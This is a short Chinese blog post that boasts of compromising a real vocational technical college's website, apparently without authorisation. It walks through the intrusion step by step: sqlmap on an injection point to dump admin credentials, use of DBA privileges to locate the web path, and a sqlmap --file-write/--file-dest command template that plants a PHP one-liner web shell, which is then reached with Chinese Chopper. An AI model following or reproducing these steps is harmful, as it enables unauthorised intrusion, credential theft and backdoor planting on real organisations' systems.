首页 > 代码库 > 实战一个职业技术学校

实战一个职业技术学校

技术分享

这是我们的目标,某一技术学院,这是一个注入点

上sqlmap

技术分享

技术分享

跑出了管理账号密码

扫后台

技术分享

没有找到,注入就相当鸡肋了

换换其他思路

技术分享

dba权限,想到了直接写入

找找路径之类的

技术分享

找到了,运气相当的好

直接利用sqlmap写入一句话

语句*sqlmap,py -u “url” –file-write=”要写入本地文件路径”(注意为/) –file-dest=”网站路径/1.php”(注意为/)

访问空白,成功了,菜刀连接

技术分享

shell到手。。。

实战一个职业技术学校